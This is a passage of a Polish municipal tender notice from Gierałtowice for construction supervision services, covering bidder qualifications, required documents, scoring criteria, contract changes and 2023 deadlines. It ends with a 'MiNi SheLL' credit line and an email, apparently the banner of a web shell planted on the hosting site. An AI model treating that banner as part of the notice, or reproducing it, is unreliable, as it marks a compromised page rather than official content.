technicznych w budownictwie muszą posiadać wymagane uprawnienia, które zostały wydane zgodnie z ustawą z dnia 7 lipca 1994r Prawo budowlane: art. 12 ust. 1 pkt 2) i ust.7, art. 12a lub uprawnienia uzyskane na podstawie przepisów obowiązujących przed wejściem w życie ustawy Prawo budowlane., natomiast w przypadku osób, które uzyskały uprawnienia w innych krajach Unii Europejskiej, a także osób ze Europejskiego Obszaru Gospodarczego (tj. Królestwo Norwegii, Księstwo Lichtensteinu, Republika Islandii) i obywateli Konfederacji Szwajcarskiej, posiadane uprawnienia muszą spełniać warunki określone w ustawie z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej . Osoby spoza terytorium Rzeczpospolitej Polskiej muszą legitymować się decyzją o uznaniu kwalifikacji zawodowych lub decyzją o prawie do świadczenia usług transgranicznych, wydanymi przez właściwe rady izby inżynierów, albo udokumentować, że zdały egzamin na uprawnienia budowlane przed właściwą izbą. <br/>W przypadku gdy Wykonawca, po zapoznaniu się z zakresem rzeczowym nadzorowanego zadania lub w trakcie realizacji zadania, stwierdzi konieczność pełnienia nadzoru inwestorskiego w innych branżach, Wykonawca w ramach pełnionego nadzoru zapewni osobę dla każdej z branż, posiadającą odpowiednie uprawnienia i spełniająca wymagania określone powyżej.<br/>3.	Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej - dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4.	Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>5.	Ocena spełniania warunków udziału w postępowaniu dokonana zostanie w oparciu o złożone podmiotowe środki dowodowe wg metody „spełnia/ nie spełnia”. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania - zgodnie z Załącznikiem nr 2 do SWZ, (oświadczenie składa się pod rygorem nieważności w formie elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym); Informacje zawarte w oświadczeniu, o którym mowa w pkt 1 stanowią wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu.<br/>2.	Oświadczenie wykonawcy ( oraz Podmiotu udostępniającego zasoby – jeżeli występuje), w zakresie braku wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainie oraz służących ochronie bezpieczeństwa narodowego - załącznik nr 13 do SWZ.<br/>3. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>4.1.Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007 r. o ochronie konkurencji i konsumentów, z innym wykonawcą, który złożył odrębną ofertę, (ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu), albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, (oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu) niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej - załącznik nr 4 do SWZ, (oświadczenie składa się pod rygorem nieważności w formie elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzone podpisem zaufanym lub podpisem osobistym).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>1. Wykaz usług określonych w SWZ, porównywalnych z usługami stanowiącymi przedmiot zamówienia, wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wstawione w okresie ostatnich 3 miesięcy - załącznik nr 5 do SWZ; <br/>2. Wykaz osób, określonych w SWZ, skierowanych przez wykonawcę do realizacji zamówienia, w szczególności odpowiedzialne za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami - załącznik nr 8 do SWZ;.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Zamawiający wymaga złożenia przedmiotowych środków dowodowych w zakresie doświadczenia Wykonawcy w związku z kryterium oceny ofert: „Doświadczenie inspektora nadzoru koordynatora”.<br/>2.2.	Doświadczenie inspektora nadzoru koordynatora tj. Inspektora posiadającego uprawnienia konstrukcyjno - budowlane (D) - waga 40%<br/>2.2.1.	W kryterium „doświadczenie inspektora nadzoru koordynatora” oferta może uzyskać maksymalnie 40 punktów.<br/>2.2.2.	W ramach kryterium „doświadczenie inspektora nadzoru koordynatora” ocenie podlegać będzie ilość nadzorowanych (przez wskazanego inspektora, który będzie koordynatorem na przedmiotowym zadaniu) robót budowlanych na obiektach kubaturowych o wartości robót budowlanych minimum 2 500 000,00 zł brutto /każde, w okresie ostatnich 3 lat przed upływem terminu składania ofert, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz z załączeniem dowodów określających czy te usługi zostały wykonane należycie i przez wskazaną osobę. <br/>Dowodami potwierdzającymi należyte wykonanie usługi są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane. Jeżeli z dokumentów potwierdzających należyte wykonanie usługi nie wynika jednoznacznie, że usługę wykonywała osoba wskazana przez Wykonawcę na stanowisko inspektora nadzoru – koordynatora, to Wykonawca dodatkowo musi dołączyć inne dokumenty z których jednoznacznie będzie wynikało, że usługi były wykonane przez wskazaną osobę (np. referencje, kopia protokołu odbioru końcowego robót budowlanych, wyciąg z dziennika budowy, kopia zgłoszenia rozpoczęcia robót budowlanych wraz z oświadczeniem o podjęciu obowiązków inspektora nadzoru itp.). Osoba ta musi spełniać wymagania określone w rozdziale VIII niniejszej SWZ. <br/>Za każdą wykazaną oraz potwierdzoną dokumentami usługę nadzoru inwestorskiego polegającą na pełnieniu funkcji inspektora nadzoru nad robotami budowlanymi, na obiektach kubaturowych o wartości robót minimum 2 500 000,00zł brutto przez wskazanego przez Wykonawcę inspektora nadzoru Zamawiający przyzna 20 pkt. (1 zadanie – 20 pkt., 2 zadania - 40 pkt.). Maksymalna ilość punktowanych zadań to dwa zadania.<br/>2.2.3.	Wykonawca na potwierdzenie spełnienia kryterium – doświadczenie inspektora nadzoru koordynatora – składa wykaz doświadczenia inspektora nadzoru koordynatora (zał. nr 1 do formularza oferty/załącznik nr 10 do SWZ ) wraz z referencjami bądź innymi dokumentami z których jednoznacznie będzie wynikało, że usługa została wykonana należycie i była wykonana przez wskazanego inspektora nadzoru. <br/>2.2.4.	Maksymalna ilość punktowanych usług nadzoru inwestorskiego w powyższym kryterium wynosi 40 pkt.<br/>2.2.5.	W sytuacji:<br/>	nie złożenia wykazu,<br/>	nie złożenia dokumentów lub braku potwierdzenia w dokumentach wskazanych w pkt 2.2.2 potwierdzających realizację usługi przez osobę wskazaną do pełnienia funkcji inspektora nadzoru koordynatora ,<br/>	nie wskazania żadnego zadania spełniającego wymagania,<br/>	złożenia tylko swojego osobistego oświadczenia o pełnieniu funkcji inspektora nadzoru bez potwierdzenia tego dowodami,<br/>	nie wskazania imienia i nazwiska osoby proponowanej do pełnienia funkcji inspektora nadzoru w załączniku nr 10,<br/>oferta wykonawcy w ramach kryterium oceny ofert „Doświadczenie inspektora nadzoru koordynatora” otrzyma 0 pkt. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 3. Ofertę składa się na Formularzu Ofertowym-zgodnie z Zał.nr1do SWZ.Wraz z ofertą Wykonawca jest zobowiązany złożyć:Wraz z formularzem oferty należy złożyć:3.1.Wykaz doświadczenia osoby wskazanej na stanowisko inspektora nadzoru-koordynatora (wraz z dowodami potwierdzającymi, że usługa została wykonana należycie)-zgodnie z kryterium oceny ofert) (zał.nr 10 doSWZ/zał.nr1 do oferty)-przedmiotowe środki dowodowe,3.2.Oświad.wstępne na podst.art.125 ust.1 Pzp.o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania (zał.nr2 do SWZ oraz w sytuacji opisanej w SWZ również zał. 2a, 2b, 3 do SWZ),3.3.Oświad.o którym mowa w art.125ust.1PZP Wykonawcy/Wykonawców wspólnie ubiegających się o udzielenie zamówienia,sporządzone na podst.Zał.nr 2 do SWZ oraz podpisane przez osoby upoważnione do reprezentacji.3.4. Oświad., o którym mowa w art.125ust.1 Pzp.Podmiotu udostępniającego zasoby, sporządzone na podstawie Zał.nr 2a do SWZ oraz podpisane przez osoby upoważnione do reprezentacji(jeżeli dotyczy).3.5.Oświad., o którym mowa w art.125ust.1 PZP Podwykonawcy niebędącego podmiotem udostępniającym zasoby,sporządzone na podstawie Zał.nr2b do SWZ oraz podpisane przez osoby upoważnione do reprezentacji (jeżeli dotyczy).3.6.Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych (KRS, CEIDG).3.7.Odpis lub informację z Krajowego Rejestru Sądowego,Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, dotyczące Wykonawcy/Wykonawców wspólnie ubiegających się o udzielenie zamówienia,Podmiotu udostępniającego zasoby,Podwykonawcy, w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania–zgodnie z zapisami SWZ.3.8.Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu,z której będzie wynikać przedmiotowe pełnomocnictwo.Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy.3.9.Zobowiązanie podmiotów udostępniających zasoby i/lub inny podmiotowy środek dowodowy potwierdzający,że Wykonawca realizując zamówienie,będzie dysponował niezbędnymi zasobami tych podmiotów, wymagane postanowieniami Rozdz.XI SWZ, w przypadku, gdy Wykonawca polega na zdolnościach innych podmiotów w celu potwierdzenia spełniania warunków udziału w postępowaniu.Wzór zobowiązania podmiotu udostępniającego zasoby stanowi Zał.nr3 do SWZ.3.10.Oświadczenie, o którym mowa w art.117ust.4 PZP,Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w zakresie określonym w Rozdz. XII pkt 3 SWZ, z którego wynika,które usługi wykonają poszczególni Wykonawcy.Wzór oświad. stanowi Zał.nr 9 do SWZ.3.11.Ewentualne zastrzeżone informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji-wraz z uzasadnieniem–zgodnie z Rozdz.10 ust. 2pkt3)SWZ.(Wykonawca nie może zastrzec informacji, o których mowa w art. 222 ust.5PZP).3.12.Oświadczenie wykonawcy, w zakresie braku wykluczenia z postępowania na podstawie art.7ust.1ustawy z dnia 13 kwietnia 2022r.o szczególnych rozwiązaniach w zakr.przeciwdziałania wspieraniu agresji na Ukrainie oraz służących ochronie bezpieczeństwa narodowego- zał.nr13 do SWZ.Oferta wraz z zał.powinna być podpisana elektronicznie przez osobę upoważn. do reprezent.Wyk.,zgod.z formą reprez.Wyk.określ.w rejestrze lub innym dokumencie,właściwym dla danej formy organizacyjnej Wyk.albo przez upełn.przedst.Wyk.W celupotwierdzenia,że osoba działająca w imieniu wyk.jest umocowana do jego reprezentowania,zam.żąda od wyk.odpisu lub inf.z KRS,CEiDG lub innego właściwego rejestru.5.Ofertę należy złożyć poprzez Platformę zgodnie z zapisami w SWZ w rozdz.XVIII.6.Oterminie złożenia oferty decyduje czas pełnego przeprocesowania transakcji na Platformie.System nie zaakceptuje oferty złożonej po terminie składania ofert. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty w wyodrębnionym pliku. Pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku gdy pełnomocnictwo zostało wystawione w postaci papierowej i opatrzone własnoręcznym podpisem przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenie zgodności cyfrowego odwzorowania z pełnomocnictwem w postaci papierowej może dokonać mocodawca ( osoba/ osoby wystawiające pełnomocnictwo ) lub notariusz. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (załącznik nr 9 do SWZ).<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. (oświadczenie i dokumenty składa się pod rygorem nieważności w formie elektronicznej, opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej, opatrzone podpisem zaufanym lub podpisem osobistym). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> ROZWIĄZANIE UMOWY,ZMIANA I ODSTĄPIENIE OD UMOWY 1.Zamawiający może odstąpić od umowy w terminie sześciu miesięcy od dnia dowiedzenia się o przyczynie odstąpienia, nie jednak później niż do dnia zakończenia okresu gwarancji i rękojmi lub rozwiązać umowę bez wypowiedzenia z winy Wykonawcy w szczególności:a.jeżeli Wykonawca pomimo uprzednich pisemnych 2-krotnych zastrzeżeń ze strony Zamawiającego nie wykonuje usługi zgodnie z umową lub uporczywie albo w rażący sposób zaniedbuje zobowiązania umowne np.:nie stawia się na wezwanie Zamawiającego,b.wszczęcia postępowania likwidacyjnego Wykonawcy,c.zostanie wydany nakaz zajęcia majątku Wykonawcy w stopniu uniemożliwiającym wykonanie przedmiotu niniejszej umowy,d.	w przypadku, gdy nałożone na Wykonawcę kary umowne przekroczą 10% wynagrodzenia umownego netto określonego w § 4 ust. 2 umowy.2.Ponadto Zamawiający może odstąpić od umowy w przypadkach określonych w art.456 ust.1pkt2 ustawy Pzp. Odstąpienie od umowy należy uzasadnić na piśmie. 3.Zamawiającemu przysługuje prawo odstąpienia od umowy z przyczyn wskazanych w przepisach kodeksu cywilnego, a także:w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, lub dalsze wykonywanie umowy może zagrozić podstawowemu interesowi bezpieczeństwa państwa lub bezpieczeństwu publicznemu; Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.W takim przypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.4.Niezależnie od odstąpienia od umowy lub rozwiązania umowy bez wypowiedzenia, zobowiązania Wykonawcy z tyt. gwarancji i rękojmi, postanowienia o odpowiedzialności Wykonawcy względem Zamawiającego, w tym obowiązek zapłaty kar umownych pozostają obowiązujące.5.Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty w przypadku:5.1.zmiany wynagrodzenia Wykonawcy w przypadku zmiany obowiązującej stawki podatku VAT, wówczas wynagrodzenie netto przysługujące Wykonawcy pozostanie bez zmian a podatek VAT zostanie dostosowany do obowiązujących przepisów,5.2.zgłoszenia zmiany osoby pełniącej funkcję Wykonawcy (zadeklarowanego inspektora nadzoru). Proponowana osoba musi spełniać wymagania opisane w SWZ. 5.3.zmiany terminu realizacji umowy o którym mowa w § 3, z następujących powodów:a.	zmiany terminu realizacji nadzorowanych robót budowlanych. Okres przesunięcia terminu realizacji umowy będzie równy okresowi, o jaki zmienił się termin realizacji nadzorowanych robót budowlanych,b.	decyzji nadzoru budowlanego, mających wpływ na przesunięcie terminu realizacji robót takich, jak wstrzymanie budowy, konieczność wykonania prac archeologicznych(badań archeologicznych). Okres przesunięcia terminu realizacji umowy będzie równy okresowi wstrzymania/okresowi wykonania prac archeologicznych,c.	wystąpienia robót dodatkowych, niezbędnych do prawidłowego wykonania realizowanego zamówienia podstawowego, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia. Okres przesunięcia terminu realizacji umowy będzie równy okresowi wykonania robót dodatkowych, d.zmian wynikających z konieczności wykonania robót niezwiązanych bezpośrednio z przedmiotem umowy i nieprzewidywalnych, których brak wykonania uniemożliwia lub utrudnia prawidłowe wykonanie przedmiotu umowy. Okres przesunięcia terminu realizacji umowy będzie równy okresowi wykonania robót, e.	zawieszenia przez Zamawiającego wykonania robót budowlanych. Okres przesunięcia terminu realizacji umowy będzie równy okresowi zawieszenia wykonania robót budowlanych.6.Zmiana umowy może także nastąpić w przypadkach, przewidzianych wprost w ustawie Pzp. 7.Wszelkie zmiany postanowień niniejszej umowy mogą być dokonywane w formie pisemnej pod rygorem nieważności i mogą być dokonywane tylko za zgodą obydwu stron. 8. Wzór umowy stanowi załącznik nr 6 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-13 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy prowadzonego postępowania. adres: https://gieraltowice.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-13 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-12</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Osobami uprawnionymi do porozumiewania się z Wykonawcami są:<br/>1.1. w zakresie proceduralnym: Danuta Kozik, tel. (032) 30-11-340; zp@gieraltowice.pl<br/>1.2. w zakresie merytorycznym: Tomasz Kania, tel. (032) 30-11-343; zp@gieraltowice.pl

Creat By MiNi SheLL
Email: jattceo@gmail.com